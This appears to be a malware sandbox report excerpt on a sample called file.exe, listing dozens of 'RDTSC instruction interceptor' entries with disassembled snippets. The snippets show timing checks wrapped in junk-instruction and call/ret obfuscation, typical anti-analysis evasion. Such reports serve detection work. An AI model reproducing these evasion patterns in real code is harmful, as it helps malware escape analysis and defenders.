                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B135F second address: 4B137E instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3D90F37F1Ch 0x00000008 jno 00007F3D90F37F16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 js 00007F3D90F37F16h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B827C second address: 4B82AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F3D90D93B48h 0x0000000b jmp 00007F3D90D93B58h 0x00000010 popad 0x00000011 pushad 0x00000012 push edi 0x00000013 jg 00007F3D90D93B46h 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B82AF second address: 4B82B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7830 second address: 4B784E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 je 00007F3D90D93B46h 0x0000000c jnl 00007F3D90D93B46h 0x00000012 pop eax 0x00000013 popad 0x00000014 pushad 0x00000015 pushad 0x00000016 jbe 00007F3D90D93B46h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79AD second address: 4B79B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79B2 second address: 4B79BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F3D90D93B46h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79BF second address: 4B79D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79D5 second address: 4B79DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B79DB second address: 4B79DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7E3B second address: 4B7E58 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D90D93B46h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F3D90D93B4Ch 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8138 second address: 4B813C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BAEF8 second address: 4BAF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F3D90D93B56h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 46F058 second address: 46F05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BCE01 second address: 4BCE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F3D90D93B4Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD2CF second address: 4BD2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD2D3 second address: 4BD2D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD3A3 second address: 4BD3A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD511 second address: 4BD516 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BDFE0 second address: 4BDFE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE0EB second address: 4BE108 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007F3D90D93B52h 0x00000011 jmp 00007F3D90D93B4Ch 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BE5DD second address: 4BE5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BEDC8 second address: 4BEDCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BEDCE second address: 4BEDD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BFFBF second address: 4BFFC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C08FB second address: 4C0948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov esi, dword ptr [ebp+122D26B4h] 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 mov edi, dword ptr [ebp+122D394Dh] 0x00000016 pop esi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007F3D90F37F18h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D1BD3h], eax 0x00000039 push eax 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jns 00007F3D90F37F16h 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1112 second address: 4C1127 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3D90D93B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F3D90D93B46h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1C32 second address: 4C1C3C instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2791 second address: 4C2797 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1C3C second address: 4C1C41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C29EE second address: 4C29F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2797 second address: 4C27BD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3D90F37F1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3D90F37F22h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C29F4 second address: 4C29F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C1C41 second address: 4C1C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C27BD second address: 4C27C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C29F8 second address: 4C2A65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov si, 82C8h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3D90F37F18h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 xor esi, 240AB37Ah 0x0000002f mov esi, 429F2E41h 0x00000034 push 00000000h 0x00000036 mov esi, 43852738h 0x0000003b xchg eax, ebx 0x0000003c jg 00007F3D90F37F30h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push ecx 0x00000048 pop ecx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C2A65 second address: 4C2A7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C575A second address: 4C575E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6CE5 second address: 4C6CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6CE9 second address: 4C6CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6CED second address: 4C6D47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F3D90D93B48h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov bh, 84h 0x00000026 push 00000000h 0x00000028 mov di, si 0x0000002b push 00000000h 0x0000002d jo 00007F3D90D93B55h 0x00000033 jmp 00007F3D90D93B4Fh 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jns 00007F3D90D93B4Ch 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7DDE second address: 4C7DEC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3D90F37F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F14 second address: 4C6F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7DEC second address: 4C7DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F18 second address: 4C6F28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F28 second address: 4C6F2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F2D second address: 4C6F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F3D90D93B46h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3D90D93B55h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F52 second address: 4C6F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3D90F37F16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8C4B second address: 4C8C59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6F5C second address: 4C6F60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8C59 second address: 4C8C5F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C7038 second address: 4C7044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3D90F37F1Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8C5F second address: 4C8CCC instructions: 0x00000000 rdtsc 0x00000002 je 00007F3D90D93B4Ch 0x00000008 ja 00007F3D90D93B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 jmp 00007F3D90D93B56h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F3D90D93B48h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 mov ebx, 0840AD90h 0x0000003a mov edi, dword ptr [ebp+122D261Dh] 0x00000040 popad 0x00000041 xchg eax, esi 0x00000042 ja 00007F3D90D93B4Ah 0x00000048 push eax 0x00000049 jc 00007F3D90D93B4Eh 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C8E9A second address: 4C8F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007F3D90F37F23h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F3D90F37F18h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov dword ptr [ebp+122D1F15h], ebx 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c jmp 00007F3D90F37F28h 0x00000041 mov eax, dword ptr [ebp+122D0E31h] 0x00000047 clc 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push ebp 0x0000004d call 00007F3D90F37F18h 0x00000052 pop ebp 0x00000053 mov dword ptr [esp+04h], ebp 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc ebp 0x00000060 push ebp 0x00000061 ret 0x00000062 pop ebp 0x00000063 ret 0x00000064 mov edi, dword ptr [ebp+122D2CCCh] 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F3D90F37F28h 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9E6F second address: 4C9E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9E73 second address: 4C9E8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3D90F37F1Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C9E8B second address: 4C9F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a add ebx, dword ptr [ebp+122D3939h] 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, esi 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F3D90D93B48h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 00000019h 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a or edi, dword ptr [ebp+122D2D1Fh] 0x00000040 mov eax, dword ptr [ebp+122D1171h] 0x00000046 mov dword ptr [ebp+122D18AAh], esi 0x0000004c push FFFFFFFFh 0x0000004e mov edi, dword ptr [ebp+122D3C09h] 0x00000054 nop 0x00000055 jmp 00007F3D90D93B53h 0x0000005a push eax 0x0000005b pushad 0x0000005c jg 00007F3D90D93B4Ch 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD379 second address: 4CD37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD4EE second address: 4CD4FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CE6F3 second address: 4CE6F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D14D5 second address: 4D1520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3D90D93B58h 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F3D90D93B4Ch 0x00000011 push 00000000h 0x00000013 xor edi, dword ptr [ebp+122D3C69h] 0x00000019 push 00000000h 0x0000001b mov bx, 89BAh 0x0000001f cmc 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F3D90D93B4Eh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D257C second address: 4D259D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3D90F37F1Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3D90F37F1Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D259D second address: 4D25A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0670 second address: 4D0676 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D1680 second address: 4D1702 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F3D90D93B50h 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F3D90D93B48h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 jl 00007F3D90D93B52h 0x00000036 jl 00007F3D90D93B4Ch 0x0000003c or edi, dword ptr [ebp+122D2D8Ah] 0x00000042 mov dword ptr fs:[00000000h], esp 0x00000049 sub dword ptr [ebp+1247B27Ch], eax 0x0000004f mov eax, dword ptr [ebp+122D0931h] 0x00000055 push edi 0x00000056 pushad 0x00000057 xor ebx, 7EFE7911h 0x0000005d add dword ptr [ebp+122D2C4Ah], ecx 0x00000063 popad 0x00000064 pop edi 0x00000065 push FFFFFFFFh 0x00000067 push eax 0x00000068 push esi 0x00000069 push esi 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF6C9 second address: 4CF6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D0715 second address: 4D071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D3466 second address: 4D34F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov di, 5511h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F3D90F37F18h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov ebx, 2FA471FEh 0x0000002e call 00007F3D90F37F1Dh 0x00000033 mov ebx, ecx 0x00000035 pop ebx 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ecx 0x0000003b call 00007F3D90F37F18h 0x00000040 pop ecx 0x00000041 mov dword ptr [esp+04h], ecx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc ecx 0x0000004e push ecx 0x0000004f ret 0x00000050 pop ecx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D2B94h] 0x00000058 xchg eax, esi 0x00000059 push edi 0x0000005a jmp 00007F3D90F37F1Dh 0x0000005f pop edi 0x00000060 push eax 0x00000061 pushad 0x00000062 ja 00007F3D90F37F18h 0x00000068 push eax 0x00000069 push edx 0x0000006a push edi 0x0000006b pop edi 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D071B second address: 4D073B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3D90D93B4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F3D90D93B4Ah 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514AE8 second address: 514AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514AEC second address: 514B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F3D90D93B46h 0x0000000e jmp 00007F3D90D93B53h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 514B0D second address: 514B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 515554 second address: 51555A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51555A second address: 51558E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F3D90F37F22h 0x0000000b popad 0x0000000c pushad 0x0000000d je 00007F3D90F37F18h 0x00000013 je 00007F3D90F37F1Eh 0x00000019 push ebx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51558E second address: 5155AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F3D90D93B56h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5155AD second address: 5155B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517FE4 second address: 517FFA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D90D93B46h 0x00000008 jp 00007F3D90D93B46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517FFA second address: 518004 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3D90F37F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518004 second address: 518029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3D90D93B55h 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F3D90D93B46h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
